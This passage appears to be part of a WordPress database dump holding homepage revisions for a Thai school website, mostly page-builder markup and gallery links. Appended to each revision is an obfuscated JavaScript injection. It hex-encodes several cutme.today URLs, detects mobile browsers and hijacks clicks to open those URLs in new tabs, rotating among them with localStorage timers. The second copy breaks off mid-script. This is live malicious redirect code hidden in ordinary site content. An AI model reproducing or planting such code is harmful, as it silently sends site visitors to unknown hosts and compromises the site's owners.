ds/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":20,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_f0d3cd-f6\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_f0d3cd-f6\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"padding\":[\"xxs\",\"\",\"\",\"\"]} /--></div>\n<!-- /wp:kadence/advancedbtn -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 10:35:27','2024-07-27 03:35:27','',14,'http://pakhaeng.ssk.in.th/?p=34',0,'revision','',0),
(35,1,'2024-07-27 10:35:38','2024-07-27 03:35:38','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":20,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_f0d3cd-f6\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_f0d3cd-f6\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"padding\":[\"0\",\"\",\"\",\"\"]} /--></div>\n<!-- /wp:kadence/advancedbtn -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g 